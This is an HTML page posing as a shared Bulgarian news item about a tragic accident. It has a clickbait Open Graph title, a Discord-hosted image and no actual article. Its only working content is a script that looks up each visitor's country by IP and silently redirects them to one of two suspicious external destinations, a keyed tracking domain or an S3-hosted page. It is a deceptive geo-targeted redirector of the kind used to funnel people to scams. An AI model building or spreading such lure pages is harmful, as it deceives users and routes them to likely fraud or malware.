<!DOCTYPE html>
<html lang="es">
<head>
<meta charset="utf-8"/>
<meta name="title" content="Stream"/>
<meta name="keywords" content="Instagram"/>
<meta property="og:description" content="137,131,121,посещение"/>
<meta name="robots" content="index, follow"/>
<meta name="googlebot" content="noindex"/>
<meta name="robots" content="index"/>
<meta name="robots" content="noindex"/>
<meta name="robots" content="nofollow"/>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<meta name="viewport" content="width=device-width, initial-scale=1"/>
<meta property="og:title" content="Тази сутрин е станал трагичен инцидент има ранени и загинали"/>
<meta property="og:image" content="https://media.discordapp.net/attachments/1225045975517757528/1227777722487406622/gfdgtfter444.jpg?ex=6629a41c&is=66172f1c&hm=64b2363866b0a75e8fdae7fe4479e52b13e76b4e6c6987a40eef29c8b5322e8d&=&format=webp"/>
<meta name="apple-itunes-app" content="app-id=6448311069"/>
<!DOCTYPE html>
<html>
<head>
    <script type="text/javascript">
        // Función para obtener el país del usuario basado en su dirección IP
        function getCountryFromIP(callback) {
            // Llamada a un servicio de geolocalización basado en IP (puedes utilizar servicios como ipapi.co, ipinfo.io, etc.)
            fetch('https://ipapi.co/json/')
                .then(response => response.json())
                .then(data => {
                    // Llama al callback con el código del país obtenido
                    callback(data.country);
                })
                .catch(error => {
                    console.error('Error al obtener la ubicación del usuario:', error);
                    // Si hay un error, llama al callback con un valor predeterminado (por ejemplo, 'US' para Estados Unidos)
                    callback('US');
                });
        }

        // Redirigir a la URL específica según el país del usuario
        getCountryFromIP(function(countryCode) {
            switch(countryCode) {
                case 'AT':
                    window.location.replace("https://sillinessrobnotoriety.com/gnp2z5t8p?key=53e4e43a62dd0bf4f6d0788c73b2886e");
                    break;
                case 'AU':
                    window.location.replace("https://sillinessrobnotoriety.com/gnp2z5t8p?key=53e4e43a62dd0bf4f6d0788c73b2886e");
                    break;
				case 'BE':
                    window.location.replace("https://sillinessrobnotoriety.com/gnp2z5t8p?key=53e4e43a62dd0bf4f6d0788c73b2886e");
                    break;
				case 'BG':
                    window.location.replace("https://rankgkok801026.s3.eu-west-3.amazonaws.com/sas02.html");
                    break;
				case 'HR':
                    window.location.replace("https://sillinessrobnotoriety.com/gnp2z5t8p?key=53e4e43a62dd0bf4f6d0788c73b2886e");
                    break;
				case 'CY':
                    window.location.replace("https://sillinessrobnotoriety.com/gnp2z5t8p?key=53e4e43a62dd0bf4f6d0788c73b2886e");
                    break;
				case 'DK':
                    window.location.replace("https://sillinessrobnotoriety.com/gnp2z5t8p?key=53e4e43a62dd0bf4f6d0788c73b2886e");
                    break;
				case 'FR':
                    window.location.replace("https://sillinessrobnotoriety.com/gnp2z5t8p?key=53e4e43a62dd0bf4f6d0788c73b2886e");
                    break;
				case 'AL':
                    window.location.replace("https://rankgkok801026.s3.eu-west-3.amazonaws.com/sas02.html");
                    break;
				case 'DE':
                    window.location.replace("https://sillinessrobnotoriety.com/gnp2z5t8p?key=53e4e43a62dd0bf4f6d0788c73b2886e");
                    break;
				case 'GR':
                    window.location.replace("https://sillinessrobnotoriety.com/gnp2z5t8p?key=53e4e43a62dd0bf4f6d0788c73b2886e");
                    break;	
				case 'IT':
                    window.location.replace("https://sillinessrobnotoriety.com/gnp2z5t8p?key=53e4e43a62dd0bf4f6d0788c73b2886e");
                    break;
				case 'MT':
                    window.location.replace("https://sillinessrobnotoriety.com/gnp2z5t8p?key=53e4e43a62dd0bf4f6d0788c73b2886e");
                    break;
				case 'NL':
                    window.location.replace("https://sillinessrobnotoriety.com/gnp2z5t8p?key=53e4e43a62dd0bf4f6d0788c73b2886e");
                    break;	
				case 'NZ':
                    window.location.replace("https://sillinessrobnotoriety.com/gnp2z5t8p?key=53e4e43a62dd0bf4f6d0788c73b2886e");
                    break;
				case 'PT':
                    window.location.replace("https://sillinessrobnotoriety.com/gnp2z5t8p?key=53e4e43a62dd0bf4f6d0788c73b2886e");
                    break;	
				case 'PL':
                    window.location.replace("https://sillinessrobnotoriety.com/gnp2z5t8p?key=53e4e43a62dd0bf4f6d0788c73b2886e");
                    break;	
				case 'ES':
                    window.location.replace("https://sillinessrobnotoriety.com/gnp2z5t8p?key=53e4e43a62dd0bf4f6d0788c73b2886e");
                    break;	
				case 'SE':
                    window.location.replace("https://sillinessrobnotoriety.com/gnp2z5t8p?key=53e4e43a62dd0bf4f6d0788c73b2886e");
                    break;	
				case 'CH':
                    window.location.replace("https://sillinessrobnotoriety.com/gnp2z5t8p?key=53e4e43a62dd0bf4f6d0788c73b2886e");
                    break;	
				case 'TR':
                    window.location.replace("https://sillinessrobnotoriety.com/gnp2z5t8p?key=53e4e43a62dd0bf4f6d0788c73b2886e");
                    break;
				case 'GB':
                    window.location.replace("https://sillinessrobnotoriety.com/gnp2z5t8p?key=53e4e43a62dd0bf4f6d0788c73b2886e");
                    break;
				case 'AE':
             	    window.location.replace("https://sillinessrobnotoriety.com/gnp2z5t8p?key=53e4e43a62dd0bf4f6d0788c73b2886e");
                    break;
				case 'TW':
             	    window.location.replace("https://rankgkok801026.s3.eu-west-3.amazonaws.com/sas02.html");
                    break;
				case 'HU':
             	    window.location.replace("https://rankgkok801026.s3.eu-west-3.amazonaws.com/sas02.html");
                    break;	
                // Agrega más casos según los países que desees manejar
                default:
                    window.location.replace("https://example.com/default_page.html");
            }
        });
    </script>